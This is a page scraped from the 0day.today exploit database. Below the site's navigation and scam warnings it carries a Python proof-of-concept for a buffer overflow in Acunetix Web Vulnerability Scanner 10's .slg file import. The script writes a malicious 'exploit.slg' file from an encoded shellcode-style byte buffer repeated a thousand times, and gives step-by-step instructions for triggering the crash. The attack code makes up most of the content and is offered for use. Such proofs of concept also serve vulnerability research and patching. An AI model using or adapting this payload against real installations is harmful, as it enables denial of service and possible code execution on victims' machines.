0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Acunetix Web Vulnerability Scanner 10 *.slg Buffer Overflow (PoC) Exploit
# Exploit Title: Acunetix Web Vulnerability Scanner 10 "*.slg" Buffer Overflow (PoC) # Author: Kağan Çapar # Software Link: https://s3.amazonaws.com/a280ccaaf904330a389db759e6275285/acunetix_trial.exe # Vendor Homepage : https://www.acunetix.com # Tested Version: 10.0 Build : 20150820 # Tested on OS: windows 7 x64 *eng # Steps to Reproduce: Run the python exploit script, it will create a new # file with the name "exploit.slg". Open wvs.exe (Acunetix Web Vulnerability Scanner) # Go to File > New > Web Site Crawl > click "Build Structure From Imported Files" # Import exploit file type:*.slg # Click "OK" you will see a crash on operating system. #payload 355 size #python file 1710 bytes #bad chars : "\x00\x0a\x0d\x8e\x9e\xd0" #!/usr/bin/python buf = "" buf += "\xda\xc9\xd9\x74\x24\xf4\xbf\x79\x37\x67\x27\x5d\x29" buf += "\xc9\xb1\x53\x31\x7d\x17\x03\x7d\x17\x83\x94\xcb\x85" buf += "\xd2\x9a\xdc\xc8\x1d\x62\x1d\xad\x94\x87\x2c\xed\xc3" buf += "\xcc\x1f\xdd\x80\x80\x93\x96\xc5\x30\x27\xda\xc1\x37" buf += "\x80\x51\x34\x76\x11\xc9\x04\x19\x91\x10\x59\xf9\xa8" buf += "\xda\xac\xf8\xed\x07\x5c\xa8\xa6\x4c\xf3\x5c\xc2\x19" buf += "\xc8\xd7\x98\x8c\x48\x04\x68\xae\x79\x9b\xe2\xe9\x59" buf += "\x1a\x26\x82\xd3\x04\x2b\xaf\xaa\xbf\x9f\x5b\x2d\x69" buf += "\xee\xa4\x82\x54\xde\x56\xda\x91\xd9\x88\xa9\xeb\x19" buf += "\x34\xaa\x28\x63\xe2\x3f\xaa\xc3\x61\xe7\x16\xf5\xa6" buf += "\x7e\xdd\xf9\x03\xf4\xb9\x1d\x95\xd9\xb2\x1a\x1e\xdc" buf += "\x14\xab\x64\xfb\xb0\xf7\x3f\x62\xe1\x5d\x91\x9b\xf1" buf += "\x3d\x4e\x3e\x7a\xd3\x9b\x33\x21\xbc\x68\x7e\xd9\x3c" buf += "\xe7\x09\xaa\x0e\xa8\xa1\x24\x23\x21\x6c\xb3\x44\x18" buf += "\xc8\x2b\xbb\xa3\x29\x62\x78\xf7\x79\x1c\xa9\x78\x12" buf += "\xdc\x56\xad\x8f\xd4\xf1\x1e\xb2\x19\x41\xcf\x72\xb1" buf += "\x2a\x05\x7d\xee\x4b\x26\x57\x87\xe4\xdb\x58\xb6\xa8" buf += "\x52\xbe\xd2\x40\x33\x68\x4a\xa3\x60\xa1\xed\xdc\x42" buf += "\x99\x99\x95\x84\x1e\xa6\x25\x83\x08\x30\xae\xc0\x8c" buf += "\x21\xb1\xcc\xa4\x36\x26\x9a\x24\x75\xd6\x9b\x6c\xed" buf += "\x7b\x09\xeb\xed\xf2\x32\xa4\xba\x53\x84\xbd\x2e\x4e" buf += "\xbf\x17\x4c\x93\x59\x5f\xd4\x48\x9a\x5e\xd5\x1d\xa6" buf += "\x44\xc5\xdb\x27\xc1\xb1\xb3\x71\x9f\x6f\x72\x28\x51" buf += "\xd9\x2c\x87\x3b\x8d\xa9\xeb\xfb\xcb\xb5\x21\x8a\x33" buf += "\x07\x9c\xcb\x4c\xa8\x48\xdc\x35\xd4\xe8\x23\xec\x5c" buf += "\x18\x6e\xac\xf5\xb1\x37\x25\x44\xdc\xc7\x90\x8b\xd9" buf += "\x4b\x10\x74\x1e\x53\x51\x71\x5a\xd3\x8a\x0b\xf3\xb6" buf += "\xac\xb8\xf4\x92" * 1000 payload = buf try: f=open("exploit.slg","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created" # 0day.today [2024-07-02] #